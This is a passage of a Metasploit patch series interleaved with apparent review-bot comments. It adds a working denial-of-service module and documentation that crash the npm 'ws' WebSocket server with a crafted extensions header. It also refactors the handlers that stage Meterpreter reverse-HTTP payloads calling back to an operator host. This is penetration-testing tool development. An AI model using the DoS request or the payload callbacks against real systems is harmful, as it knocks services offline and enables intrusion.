From c992837f0d09359a920122ea046979d2ca1ac30e Mon Sep 17 00:00:00 2001
From: Ryan Knell
Date: Thu, 7 Dec 2017 10:45:57 -0500
Subject: [PATCH 01/37] Adding ws DoS module This module verifies if ws is vulnerable to DoS by sending a request to the server containing a specific header value. ws is a npm module which handles websockets.
---
 modules/auxiliary/dos/http/ws_dos.rb | 72 ++++++++++++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 modules/auxiliary/dos/http/ws_dos.rb
diff --git a/modules/auxiliary/dos/http/ws_dos.rb b/modules/auxiliary/dos/http/ws_dos.rb
new file mode 100644
index 0000000000..04b8982b41
--- /dev/null
+++ b/modules/auxiliary/dos/http/ws_dos.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Auxiliary::Dos
+
+ def initialize
+ super(
+ 'Name' => 'ws - Denial of Service',
+ 'Description' => %q{
+ This module exploits a Denial of Service vulnerability in npm module "ws".
+ By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
+ },
+ 'References' =>
+ [
+ ['URL', 'https://nodesecurity.io/advisories/550'],
+ ['CWE', '400'],
+ ],
+ 'Author' =>
+ [
+ 'Ryan Knell, Sonatype Security Research',
+ 'Nick Starke, Sonatype Security Research',
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options([
+ Opt::RPORT(3000),
+ OptString.new('TARGETURI', [true, 'The base path', '/']),
+ ],)
+ end
+
+ def run
+ path = datastore['TARGETURI']
+
+ #Create HTTP request
+ req = [
+ "GET #{path} HTTP/1.1",
+ "Connection: Upgrade",
+ "Sec-WebSocket-Key: test",
+ "Sec-WebSocket-Version: 8",
+ "Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS
+ "Upgrade: websocket",
+ "\r\n"
+ ].join("\r\n");
+
+ begin
+ connect
+ print_status("Sending DoS packet to #{peer}")
+ sock.put(req)
+
+ data = sock.get_once(-1) #Attempt to retrieve data from the socket
+
+ if data =~ /101/ #This is the expected HTTP status code. IF it's present, we have a valid upgrade response.
+ print_error("WebSocket Upgrade request Successful, service not vulnerable.")
+ else
+ fail_with(Failure::Unknown, "An unknown error occured")
+ end
+
+ disconnect
+ print_error("DoS packet unsuccessful")
+
+ rescue ::Rex::ConnectionRefused
+ print_error("Unable to connect to #{peer}")
+ rescue ::Errno::ECONNRESET, ::EOFError
+ print_good("DoS packet successful. #{peer} not responding.")
+ end
+ end
+end
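Review bot: In `run`, `disconnect` is only reached on the `data =~ /101/` branch, because `fail_with` on the `else` branch raises before it and neither `rescue` clause releases the socket; move the cleanup into an `ensure` clause of that `begin` block so every exit path runs `disconnect`. The `/101/` match is also loose — it fires on any response that contains those three digits anywhere (a body, a `Content-Length` value), so anchor it to the status line, e.g. `if data =~ %r{\AHTTP/1\.[01] 101}`. Finally, `"An unknown error occured"` is misspelled (`occurred`), and `print_error("DoS packet unsuccessful")` after `disconnect` repeats the "service not vulnerable" message printed just above it on the only path that reaches it.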
From 668585a1f9a51dc442cf78de7ac73601fd39049f Mon Sep 17 00:00:00 2001
From: Ryan Knell
Date: Fri, 8 Dec 2017 15:52:57 -0500
Subject: [PATCH 02/37] Adding documentation Adding module documentation for ws_dos.
---
 .../modules/auxiliary/dos/http/ws_dos.md | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 documentation/modules/auxiliary/dos/http/ws_dos.md
diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md
new file mode 100644
index 0000000000..daad55946d
--- /dev/null
+++ b/documentation/modules/auxiliary/dos/http/ws_dos.md
@@ -0,0 +1,61 @@ +## Vulnerable Application + + [ws < 1.1.5 || (2.0.0 , 3.3.1)] + (https://nodesecurity.io/advisories/550) + +## Vulnerable Analysis + + This module exploits a Denial of Service vulnerability in npm module "ws". + By sending a specially crafted value of the Sec-WebSocket-Extensions header + on the initial WebSocket upgrade request, the ws component will crash. + +## Verification Steps + +1. Start the vulnerable server using the sample server code below `node server.js` +2. Start `msfconsole` +3. `use auxiliary/dos/http/ws_dos` +4. `set RHOST XXX.XXX.XXX.XXX` +5. `run` +6. The server should crash + +## Options + + None. + +## Scenarios + +## Server output from crash +``` +/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40 + paramsList.push(parsedParams); + ^ + +TypeError: paramsList.push is not a function + at value.split.forEach (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40:16) + at Array.forEach () + at Object.parse (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:15:20) + at WebSocketServer.completeUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:230:30) + at WebSocketServer.handleUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:197:10) + at Server.WebSocketServer._ultron.on (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:87:14) + at emitThree (events.js:136:13) + at Server.emit (events.js:217:7) + at onParserExecuteCommon (_http_server.js:495:14) + at onParserExecute (_http_server.js:450:3) +``` + +## Sample server +``` +const WebSocket = require('ws'); +const wss = new WebSocket.Server( +{ port: 3000 } +); +wss.on('connection', function connection(ws) { +console.log('connected'); +ws.on('message', function incoming(message) +{ console.log('received: %s', message); } +); +ws.on('error', function (err) +{ console.error(err); } +); +}); +``` From c5f218c84c60373f0d01441577e90a63497d4edb Mon Sep 17 00:00:00 2001 
From: Ryan Knell Date: Mon, 11 Dec 2017 11:49:31 -0500 Subject: [PATCH 03/37] Addressing comments 1. Updated documentation 2. Made the Sec-WebSocket-Key header a random value --- .../modules/auxiliary/dos/http/ws_dos.md | 18 +++++++----------- modules/auxiliary/dos/http/ws_dos.rb | 2 +- 2 files changed, 8 insertions(+), 12 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md index daad55946d..6668f471df 100644 --- a/documentation/modules/auxiliary/dos/http/ws_dos.md +++ b/documentation/modules/auxiliary/dos/http/ws_dos.md @@ -1,26 +1,22 @@ ## Vulnerable Application - - [ws < 1.1.5 || (2.0.0 , 3.3.1)] - (https://nodesecurity.io/advisories/550) +ws < 1.1.5 || (2.0.0 , 3.3.1) +https://nodesecurity.io/advisories/550 ## Vulnerable Analysis - - This module exploits a Denial of Service vulnerability in npm module "ws". - By sending a specially crafted value of the Sec-WebSocket-Extensions header - on the initial WebSocket upgrade request, the ws component will crash. +This module exploits a Denial of Service vulnerability in npm module "ws". +By sending a specially crafted value of the Sec-WebSocket-Extensions header +on the initial WebSocket upgrade request, the ws component will crash. ## Verification Steps - 1. Start the vulnerable server using the sample server code below `node server.js` 2. Start `msfconsole` 3. `use auxiliary/dos/http/ws_dos` -4. `set RHOST XXX.XXX.XXX.XXX` +4. `set RHOST 5. `run` 6. The server should crash ## Options - - None. +None. ## Scenarios diff --git a/modules/auxiliary/dos/http/ws_dos.rb b/modules/auxiliary/dos/http/ws_dos.rb index 04b8982b41..0c4162d2c6 100644 --- a/modules/auxiliary/dos/http/ws_dos.rb +++ b/modules/auxiliary/dos/http/ws_dos.rb 
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
 req = [
 "GET #{path} HTTP/1.1",
 "Connection: Upgrade",
- "Sec-WebSocket-Key: test",
+ "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5).to_s}",
 "Sec-WebSocket-Version: 8",
 "Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS
 "Upgrade: websocket",
From 017374be7156e4ccc410b075ed1b054cf2fa9fe6 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 10 Dec 2017 02:38:46 -0600
Subject: [PATCH 04/37] pass lhost/lport back into generate_stage with reverse_http/s
---
 lib/msf/core/handler/reverse_http.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 025e127608..c51a79de4e 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -369,6 +369,8 @@ protected
 blob = self.generate_stage(
 url: url,
 uuid: uuid,
+ lhost: uri.host,
+ lport: uri.port,
 uri: conn_id
 )
 
From 636b93b0261539e81ebea290b976ab9e4b65749b Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 10 Dec 2017 11:29:41 -0600
Subject: [PATCH 05/37] minor simplification
---
 lib/msf/core/payload/python/meterpreter_loader.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
index 5bb0143857..7b0a50b3b2 100644
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
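Review bot: `.to_s` on `Rex::Text.rand_text_alpha(rand(10) + 5)` is redundant — the helper already returns a String — and it reads as though the value needed coercion; `"Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5)}",` is enough. The enclosing `run` method starts and ends outside the hunk.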
@@ -110,9 +110,9 @@ module Payload::Python::MeterpreterLoader callback_url = [ opts[:url].to_s.split(':')[0], '://', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + (ds['OverrideRequestHost'] ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, ':', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + (ds['OverrideRequestHost'] ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, ds['LURI'].to_s, uri, '/' From 8e76c4cb4f5ad0d1aeba76d04a42b3a13433416e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 11:29:59 -0600 Subject: [PATCH 06/37] handle override at the meterpreter config layer --- lib/msf/core/handler/reverse_http.rb | 2 -- lib/msf/core/payload/transport_config.rb | 22 ++++++++++++++++++---- 2 files changed, 18 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index c51a79de4e..025e127608 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -369,8 +369,6 @@ protected blob = self.generate_stage( url: url, uuid: uuid, - lhost: uri.host, - lport: uri.port, uri: conn_id ) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 84e257bcce..28e754827a 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -37,7 +37,11 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) - config[:scheme] = ds['OverrideScheme'] || 'https' + if ds['OverrideRequestHost'] + config[:scheme] = ds['OverrideScheme'] || 'https' + else + config[:scheme] = 'https' + end config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) config 
@@ -55,10 +59,20 @@ module Msf::Payload::TransportConfig end ds = opts[:datastore] || datastore + + scheme = 'http' + lhost = ds['LHOST'] + lport = ds['LPORT'] + if ds['OverrideRequestHost'] + scheme = ds['OverrideScheme'] || 'http' + lhost = ds['OverrideLHOST'] || ds['LHOST'] + lport = ds['OverrideLPORT'] || ds['LPORT'] + end + { - scheme: ds['OverrideScheme'] || 'http', - lhost: opts[:lhost] || ds['LHOST'], - lport: (opts[:lport] || ds['LPORT']).to_i, + scheme: scheme, + lhost: lhost, + lport: lport.to_i, uri: uri, ua: ds['HttpUserAgent'], proxy_host: ds['HttpProxyHost'], From f49006222cde1e45bf73783b9dd8888a4b9c84c6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 12:34:34 -0600 Subject: [PATCH 07/37] remove unneeded uri --- lib/msf/core/handler/reverse_http.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 025e127608..a720b65993 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -360,7 +360,6 @@ protected # Damn you, python! Ruining my perfect world! url += "\x00" unless uuid.arch == ARCH_PYTHON - uri = URI(payload_uri(req) + conn_id) # TODO: does this have to happen just for windows, or can we set it for all? resp['Content-Type'] = 'application/octet-stream' if uuid.platform == 'windows' From 528a423fc0da887c3aa7f04e5082761166f2f835 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 12:34:51 -0600 Subject: [PATCH 08/37] fix python override scheme --- .../core/payload/python/meterpreter_loader.rb | 23 +++++++++++-------- lib/msf/core/payload/transport_config.rb | 11 ++++----- 2 files changed, 18 insertions(+), 16 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 7b0a50b3b2..682d5e91b2 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb 
@@ -107,16 +107,19 @@ module Payload::Python::MeterpreterLoader # TODO: move this to somewhere more common so that it can be used across payload types unless opts[:url].to_s == '' uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" - callback_url = [ - opts[:url].to_s.split(':')[0], - '://', - (ds['OverrideRequestHost'] ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, - ':', - (ds['OverrideRequestHost'] ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, - ds['LURI'].to_s, - uri, - '/' - ].join('') + + scheme = opts[:url].to_s.split(':')[0] + lhost = ds['LHOST'] + lport = ds['LPORT'] + if ds['OverrideRequestHost'] + scheme = ds['OverrideScheme'] || scheme + lhost = ds['OverrideLHOST'] || lhost + lport = ds['OverrideLPORT'] || lport + end + + callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/" + + $stderr.puts callback_url # patch in the various payload related configuration met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 28e754827a..c83c50da2e 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -37,10 +37,9 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) + config[:scheme] = 'https' if ds['OverrideRequestHost'] - config[:scheme] = ds['OverrideScheme'] || 'https' - else - config[:scheme] = 'https' + config[:scheme] = ds['OverrideScheme'] || config[:scheme] end config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) 
@@ -64,9 +63,9 @@ module Msf::Payload::TransportConfig lhost = ds['LHOST'] lport = ds['LPORT'] if ds['OverrideRequestHost'] - scheme = ds['OverrideScheme'] || 'http' - lhost = ds['OverrideLHOST'] || ds['LHOST'] - lport = ds['OverrideLPORT'] || ds['LPORT'] + scheme = ds['OverrideScheme'] || scheme + lhost = ds['OverrideLHOST'] || lhost + lport = ds['OverrideLPORT'] || lport end { From bb5ea540abd5ae42b99cc83b1e752a5866f85152 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 12:54:51 -0600 Subject: [PATCH 09/37] fix a number of TODO's in the HTTP handler, remove duplication in handlers --- lib/msf/core/handler/reverse_http.rb | 69 +++++++++------------------- 1 file changed, 21 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index a720b65993..68a7976205 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -339,6 +339,13 @@ protected self.pending_connections += 1 + resp.body = '' + resp.code = 200 + resp.message = 'OK' + + url = payload_uri(req) + conn_id + url << '/' unless url[-1] == '/' + # Process the requested resource. case info[:mode] when :init_connect 
@@ -354,58 +361,27 @@ protected pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/") resp.body = pkt.to_r - when :init_python, :init_native, :init_java + when :init_python, :init_native, :init_java, :connect # TODO: at some point we may normalise these three cases into just :init - url = payload_uri(req) + conn_id + '/' - # Damn you, python! Ruining my perfect world! - url += "\x00" unless uuid.arch == ARCH_PYTHON + if info[:mode] == :connect + print_status("Attaching orphaned/stageless session...") + else + begin + blob = self.generate_stage(url: url, uuid: uuid, uri: conn_id) + blob = encode_stage(blob) if self.respond_to?(:encode_stage) - # TODO: does this have to happen just for windows, or can we set it for all? - resp['Content-Type'] = 'application/octet-stream' if uuid.platform == 'windows' + print_status("Staging #{uuid.arch} payload (#{blob.length} bytes) ...") - begin - blob = self.generate_stage( - url: url, - uuid: uuid, - uri: conn_id - ) + resp['Content-Type'] = 'application/octet-stream' + resp.body = blob - blob = encode_stage(blob) if self.respond_to?(:encode_stage) - - print_status("Staging #{uuid.arch} payload (#{blob.length} bytes) ...") - - resp.body = blob - - # Short-circuit the payload's handle_connection processing for create_session - create_session(cli, { - :passive_dispatcher => self.service, - :conn_id => conn_id, - :url => url, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i, - :ssl => ssl?, - :payload_uuid => uuid - }) - rescue NoMethodError - print_error("Staging failed. This can occur when stageless listeners are used with staged payloads.") - return + rescue NoMethodError + print_error("Staging failed. 
This can occur when stageless listeners are used with staged payloads.") + return + end end - when :connect - print_status("Attaching orphaned/stageless session...") - - resp.body = '' - - url = payload_uri(req) + conn_id - url << '/' unless url[-1] == '/' - - # Damn you, python! Ruining my perfect world! - url += "\x00" unless uuid.arch == ARCH_PYTHON - - # Short-circuit the payload's handle_connection processing for create_session create_session(cli, { :passive_dispatcher => self.service, :conn_id => conn_id, @@ -422,8 +398,6 @@ protected unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode]) print_status("Unknown request to #{request_summary}") end - resp.code = 200 - resp.message = 'OK' resp.body = datastore['HttpUnknownRequestResponse'].to_s self.pending_connections -= 1 end @@ -435,6 +409,5 @@ protected end end - end end From b7c231bb93c936424b39a547284e729564e49d47 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 13:00:56 -0600 Subject: [PATCH 10/37] further normalize transport config --- lib/msf/core/payload/python/meterpreter_loader.rb | 2 -- lib/msf/core/payload/transport_config.rb | 6 +----- 2 files changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 682d5e91b2..b5db7c647f 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -119,8 +119,6 @@ module Payload::Python::MeterpreterLoader callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/" - $stderr.puts callback_url - # patch in the various payload related configuration met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' 
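Review bot: The merged `when :init_python, :init_native, :init_java, :connect` branch no longer appends `"\x00"` to `url` for non-Python payloads — both removed branches ran `url += "\x00" unless uuid.arch == ARCH_PYTHON` before `generate_stage` and `create_session` — and the commit message does not call this out; if native stagers rely on a NUL-terminated URL being patched in, staging and session creation would now differ, so either restore that line next to `url << '/' unless url[-1] == '/'` in the earlier hunk (`@@ -339,6 +346,13 @@`) or add a comment there stating why the terminator is no longer needed. The comment `# TODO: at some point we may normalise these three cases into just :init` is now stale, since the `when` lists four modes including `:connect`; reword it to `# TODO: normalise the :init_* cases into a single :init mode (:connect shares the session setup below)`. The enclosing method starts before this hunk and its `create_session` call continues past it.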
diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index c83c50da2e..57c06aaa3d 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -37,10 +37,6 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) - config[:scheme] = 'https' - if ds['OverrideRequestHost'] - config[:scheme] = ds['OverrideScheme'] || config[:scheme] - end config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) config @@ -59,7 +55,7 @@ module Msf::Payload::TransportConfig ds = opts[:datastore] || datastore - scheme = 'http' + scheme = opts[:url].to_s.split(':')[0] lhost = ds['LHOST'] lport = ds['LPORT'] if ds['OverrideRequestHost'] From f7dfba6bae32a9127052ebe3b9d0fca656296902 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 13:08:05 -0600 Subject: [PATCH 11/37] deduplicate code from python meterpreter --- .../core/payload/python/meterpreter_loader.rb | 16 +++++------- lib/msf/core/payload/transport_config.rb | 25 ++++++++++++------- 2 files changed, 22 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index b5db7c647f..3c14a4d7c1 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'msf/core' +require 'msf/core/payload/transport_config' require 'msf/base/sessions/meterpreter_options' require 'msf/core/payload/uuid/options' @@ -16,6 +17,7 @@ module Payload::Python::MeterpreterLoader include Msf::Payload::Python include Msf::Payload::UUID::Options + include Msf::Payload::TransportConfig include Msf::Sessions::MeterpreterOptions def initialize(info = {}) 
@@ -106,17 +108,11 @@ module Payload::Python::MeterpreterLoader # so we need to generate it # TODO: move this to somewhere more common so that it can be used across payload types unless opts[:url].to_s == '' + + # Build the callback URL (TODO: share this logic with TransportConfig uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" - - scheme = opts[:url].to_s.split(':')[0] - lhost = ds['LHOST'] - lport = ds['LPORT'] - if ds['OverrideRequestHost'] - scheme = ds['OverrideScheme'] || scheme - lhost = ds['OverrideLHOST'] || lhost - lport = ds['OverrideLPORT'] || lport - end - + opts[:scheme] ||= opts[:url].to_s.split(':')[0] + scheme, lhost, lport = transport_uri_components(opts) callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/" # patch in the various payload related configuration diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 57c06aaa3d..678d3b305f 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -36,12 +36,26 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore + opts[:scheme] ||= 'https' config = transport_config_reverse_http(opts) config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) config end + def transport_uri_components(opts={}) + ds = opts[:datastore] || datastore + scheme = opts[:scheme] + lhost = ds['LHOST'] + lport = ds['LPORT'] + if ds['OverrideRequestHost'] + scheme = ds['OverrideScheme'] || scheme + lhost = ds['OverrideLHOST'] || lhost + lport = ds['OverrideLPORT'] || lport + end + [scheme, lhost, lport] + end + def transport_config_reverse_http(opts={}) # most cases we'll have a URI already, but in case we don't # we should ask for a connect to happen given that this is 
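Review bot: The new comment `# Build the callback URL (TODO: share this logic with TransportConfig` has an unbalanced parenthesis, and its TODO is resolved by this very hunk, which now calls `transport_uri_components`; replace it with `# Build the callback URL from the scheme/host/port resolved by TransportConfig#transport_uri_components`. Note also that `opts[:scheme] ||= opts[:url].to_s.split(':')[0]` writes into the caller's `opts` hash, so a caller that reuses one hash across generations keeps the first scheme it saw — worth a short comment if that is intended. The `unless opts[:url].to_s == ''` block and the surrounding method extend beyond the hunk.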
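Review bot: `transport_uri_components` is a new public helper on the mixin with no doc comment, and `opts[:scheme] ||= 'https'` in `transport_config_reverse_https` mutates the hash the caller passed in, which is easy to miss when the same `opts` is later handed to `transport_config_reverse_http` for a plain-HTTP transport. Add above the method `# Resolve the scheme, host and port for the callback URI, honouring the OverrideRequestHost / OverrideScheme / OverrideLHOST / OverrideLPORT datastore options; returns [scheme, lhost, lport]`, and consider passing the default without mutating the argument, e.g. `config = transport_config_reverse_http(opts.merge(scheme: opts[:scheme] || 'https'))`. The body of `transport_config_reverse_http` continues past the hunk.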
@@ -54,15 +68,8 @@ module Msf::Payload::TransportConfig end ds = opts[:datastore] || datastore - - scheme = opts[:url].to_s.split(':')[0] - lhost = ds['LHOST'] - lport = ds['LPORT'] - if ds['OverrideRequestHost'] - scheme = ds['OverrideScheme'] || scheme - lhost = ds['OverrideLHOST'] || lhost - lport = ds['OverrideLPORT'] || lport - end + opts[:scheme] ||= 'http' + scheme, lhost, lport = transport_uri_components(opts) { scheme: scheme, From 3f6846c3320b661f088d1189d652fd34e69f7c9b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 12 Dec 2017 03:13:38 -0600 Subject: [PATCH 12/37] update payloads with python retry fix --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index e7df9af975..3eb282d059 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.19) + metasploit-payloads (= 1.3.20) metasploit_data_models metasploit_payloads-mettle (= 0.2.8) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.19) + metasploit-payloads (1.3.20) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 873d24e759..d1503dbacb 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.19' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.20' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index f5e7303a36..4d4122c50f 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57798 + CachedSize = 58390 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index f016ee0023..718834de94 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57762 + CachedSize = 58354 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index d13916ecb6..1332079c54 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57762 + CachedSize = 58354 include Msf::Payload::Single include Msf::Payload::Python 
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 721b61e0de..ed4250ec79 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57714 + CachedSize = 58306 include Msf::Payload::Single include Msf::Payload::Python From c4e20e01e3156f8e09dc498e29ac1a3d52d609bd Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 12 Dec 2017 16:05:23 +0800 Subject: [PATCH 13/37] iOS meterpreter --- .../sessions/meterpreter_aarch64_apple_ios.rb | 29 ++++++++++++ lib/msf/core/module/platform.rb | 8 ++++ lib/msf/core/payload/uuid.rb | 3 +- modules/exploits/multi/handler.rb | 2 +- .../aarch64/meterpreter_reverse_http.rb | 44 +++++++++++++++++++ .../aarch64/meterpreter_reverse_https.rb | 44 +++++++++++++++++++ .../aarch64/meterpreter_reverse_tcp.rb | 44 +++++++++++++++++++ tools/modules/generate_mettle_payloads.rb | 3 +- 8 files 